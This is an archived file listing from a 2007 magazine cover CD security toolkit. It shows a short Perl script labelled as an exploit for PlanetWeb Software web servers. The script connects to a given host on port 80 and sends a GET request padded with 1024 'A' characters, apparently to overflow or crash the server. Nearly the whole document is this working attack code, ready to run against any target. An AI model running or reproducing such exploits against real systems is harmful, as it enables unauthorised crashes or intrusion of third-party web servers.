home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / planetweb / planetweb-ex.pl < prev    next >
Perl Script  |  2005-02-12  |  577b  |  19 lines

  1. #!/usr/bin/perl
  2. # PlanetWeb Software perl exploit
  3. # by UkR-XblP / UkR security team
  4. use IO::Socket;
  5. unless (@ARGV == 1) { die "usage: $0 vulnurable_server
  6. ..." }
  7. $host = shift(@ARGV);
  8. $remote = IO::Socket::INET->new( Proto     => "tcp",
  9.                                   PeerAddr  => $host,
  10.                                   PeerPort  => "http(80)",
  11.                                   );
  12. unless ($remote) { die "cannot connect to http daemon on
  13. $host" }
  14. $xblp = "A" x 1024;
  15. $exploit = "GET /".$xblp." HTTP/1.0\n\n";
  16. $remote->autoflush(1);
  17. print $remote $exploit;
  18. close $remote;
  19.